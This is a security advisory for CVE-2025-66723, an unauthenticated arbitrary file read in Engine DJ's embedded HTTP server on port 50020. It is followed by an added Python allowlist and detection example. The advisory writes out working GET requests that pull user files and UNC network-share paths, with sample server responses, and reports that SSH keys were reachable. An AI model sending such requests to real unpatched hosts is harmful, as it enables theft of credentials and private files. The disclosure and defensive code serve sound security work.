CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 through <4.3.4 exposes local and network files to external parties
inMusic Brands software Engine DJ contains an embedded HTTP server for transmitting media library files to connected clients on the network. The media files are referenced by filesystem path. Engine DJ does not authenticate clients or restrict requested filesystem paths. This allows an attacker to exfiltrate sensitive local or network-accessible files from affected systems.
An attacker requires only network access to the affected host; no authentication or prior interaction is required.
Engine DJ v4.3.4, released November 17, 2025, includes a mitigation. Users are encouraged to upgrade as soon as possible.
CVSS v3.1 Base Score: 7.5 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Engine DJ >=3.0.0, <4.3.4, on all platforms (macOS, Windows).
Specifically tested versions found affected/vulnerable, macOS and Windows:
3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.3.0, 3.4.0,
4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.3.0
Specifically tested versions found unaffected, macOS and Windows:
2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
4.3.4
When started, Engine DJ binds to port :50020 on every IPv4 network interface
except for localhost.
Clients are intended to use a separate gRPC service on port :50010 to request
access and search for media files. Once the desired media file path is found,
the client will then make an HTTP request back on port :50020:
GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1
Host: 192.0.2.1:50020
User-Agent: EngineOS/1.0 DenonDJ
Accept: */*
HTTP/1.1 200 OK
Content-Length: 37517194
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5
…
Note: When decoded, the GET path above is simply:
/download/<C:/Music/test.flac>
It is not necessary to percent-encode these characters when making requests; the raw form is accepted as well.
An attacker can request any file readable by the user account under which the Engine DJ software is running, as long as the path is known to the attacker. In this example, a text file is used for testing:
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
HTTP/1.1 200 OK
Content-Length: 40
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5
INSECURE...
From text file test.txt
Files accessed during proof-of-concept lab testing included private SSH keys and environment files.
Requested paths are not limited to local files. Network paths were also found to be accessible, subject to the permissions of the host:
/download/<//EXAMPLE-SERVER/C$/secret.txt>
Fortunately, there is no Access-Control-Allow-Origin header or related headers
in the response from the server. Therefore, files are not accessible from
normal web-based clients. Certain browser extensions or flags can be used to
loosen cross-origin request restrictions, but are uncommon.
IPv4 network traffic on port :50020 can be used to guess that
Engine DJ is in use, but it does not indicate whether a host is vulnerable.
The embedded server does not identify itself in its responses, and there appears
to be no measurable difference between vulnerable and invulnerable versions of
Engine DJ. Therefore, it does not appear to be externally possible to determine
whether a host is vulnerable, short of attempting to request a file known to
exist.
Immediately after discovery, inMusic Brands was notified of the vulnerability through their technical support channels. Response was professional and swift, and a mitigation for the issue was released as part of v4.3.4 on November 17, 2025 for both macOS and Windows.
While media files can still be downloaded without authentication/authorization,
the requestable paths are now whitelisted so that attempting to access a file
outside of the media library is not possible. Users will receive a 403
response for anything not on the whitelist, even if it does not exist.
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
HTTP/1.1 403 Forbidden
Content-Length: 17
Content-Type: text/html
Keep-Alive: timeout=5, max=5
…
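The following is an added example, not inMusic's code, showing the two pieces a defender cares about here: the request-path decoding described above (both the percent-encoded form the real client sends and the raw `/download/<path>` form), and a library-root allowlist of the kind the v4.3.4 mitigation describes, which rejects paths outside the media library, including `..` traversal and UNC network paths such as `//EXAMPLE-SERVER/C$/secret.txt`. The same check is then run over constructed captured request lines, which is what a network sensor watching TCP/50020 can alert on, given that the server itself gives no external indication of its version. Engine DJ's internal behaviour, the library root locations and the sample requests are assumptions.

```python
"""Added example (not Engine DJ's code): decode /download/<path> targets and
apply a media-library allowlist, then use that check as detection logic over
captured request lines. Library roots and sample requests are constructed."""
import posixpath
from typing import List, Optional
from urllib.parse import unquote

# Constructed sample: the only directories the server is allowed to serve from.
LIBRARY_ROOTS = ["C:/Music", "/Users/dj/Music"]

# Constructed sample of request lines as a sensor on TCP/50020 might see them.
SAMPLE_REQUESTS = [
    "GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1",
    "GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1",
    "GET /download/<//EXAMPLE-SERVER/C$/secret.txt> HTTP/1.1",
]


def parse_download_path(request_target: str) -> Optional[str]:
    """Extract the filesystem path from a /download/<path> request target.

    Accepts the percent-encoded form (/download/%3CC%3A%2FMusic%2Ftest.flac%3E)
    and the raw form (/download/<C:/Music/test.flac>). Returns None when the
    target is not a download request at all.
    """
    decoded = unquote(request_target)
    prefix = "/download/"
    if not decoded.startswith(prefix):
        return None
    path = decoded[len(prefix):]
    if path.startswith("<") and path.endswith(">"):
        path = path[1:-1]
    return path


def normalize(path: str) -> str:
    """Canonical form for comparison: forward slashes, '..' collapsed, lower case.

    Lower-casing models Windows' case-insensitive filesystem; a production
    check should additionally resolve symlinks with the platform's own rules.
    posixpath.normpath keeps a leading '//', so UNC paths stay recognisable.
    """
    return posixpath.normpath(path.replace("\\", "/")).lower()


def is_allowed(path: str, roots: List[str] = LIBRARY_ROOTS) -> bool:
    """True only if the normalized path lies inside one of the library roots.

    The trailing '/' in the prefix test stops 'C:/MusicEvil' from matching
    the root 'C:/Music'.
    """
    norm = normalize(path)
    for root in roots:
        r = normalize(root)
        if norm == r or norm.startswith(r + "/"):
            return True
    return False


def decide(request_target: str) -> int:
    """Status the allowlist check yields before any file is opened:
    200 for a library path, 403 for anything outside it (whether or not the
    file exists), 404 for targets that are not download requests."""
    path = parse_download_path(request_target)
    if path is None:
        return 404
    return 200 if is_allowed(path) else 403


def flag_requests(request_lines: List[str]) -> List[str]:
    """Detection: return the requested paths that reach outside the library."""
    flagged = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2 or parts[0] != "GET":
            continue
        path = parse_download_path(parts[1])
        if path is not None and not is_allowed(path):
            flagged.append(path)
    return flagged


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        target = req.split()[1]
        print(decide(target), parse_download_path(target))
    print("flagged:", flag_requests(SAMPLE_REQUESTS))
```

Run against the constructed requests, only the library file yields 200; the user-profile file, the UNC path and any `..` traversal that resolves outside a root are refused with 403 regardless of whether they exist, which matches the behaviour the advisory reports for v4.3.4. On the monitoring side, a `/download/` target whose decoded path is not under a known library root is a strong signal worth alerting on, since the advisory notes that nothing in the server's responses distinguishes a patched host from an unpatched one.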
Official downloads of the latest Engine DJ releases can be found on the official Engine DJ website:
https://enginedj.com/downloads
For questions about this report, please contact the author:
Brad Isbell, AudioPump, Inc. brad@audiopump.co